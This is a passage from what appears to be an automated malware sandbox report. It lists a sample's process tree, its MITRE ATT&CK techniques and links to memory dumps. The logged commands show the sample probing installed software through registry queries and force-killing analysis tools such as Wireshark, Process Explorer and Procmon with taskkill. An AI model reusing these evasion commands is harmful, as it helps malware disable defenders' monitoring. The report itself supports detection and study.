    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:4980
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4916
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:5052
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:5076
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5092
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:64
    3⤵
    PID:4112
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{4A03706F-666A-4037-7777-5F2748764D10}" /reg:32
    3⤵
    PID:4140
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:400
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:64
    3⤵
    PID:4000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}" /reg:32
    3⤵
    PID:3704
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:3608
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    PID:2772
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:3880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    PID:3708
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:3700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    PID:3964
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:724
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3380
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2416
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4256
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4396
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4544

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3904-86-0x000001B6BFB90000-0x000001B6BFB91000-memory.dmp

Filesize
4KB

Download
memory/3904-95-0x000001B6BFD40000-0x000001B6BFD41000-memory.dmp

Filesize
4KB

Download
memory/3904-76-0x00007FFE43410000-0x00007FFE43DFC000-memory.dmp

Filesize
9.9MB

Download